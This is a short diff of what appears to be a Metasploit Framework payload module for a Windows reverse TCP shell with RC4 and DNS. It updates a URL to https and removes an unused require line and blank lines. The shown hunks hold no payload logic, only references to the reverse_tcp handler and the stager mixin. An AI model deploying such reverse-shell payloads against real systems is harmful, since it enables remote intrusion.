@@ -1,11 +1,9 @@
 # -*- coding: binary -*-
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
-require 'msf/core'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/core/payload/windows/reverse_tcp_rc4_dns'
 
@@ -34,5 +32,4 @@ module MetasploitModule
         { 'RequiresMidstager' => false }
       ))
   end
-
 end
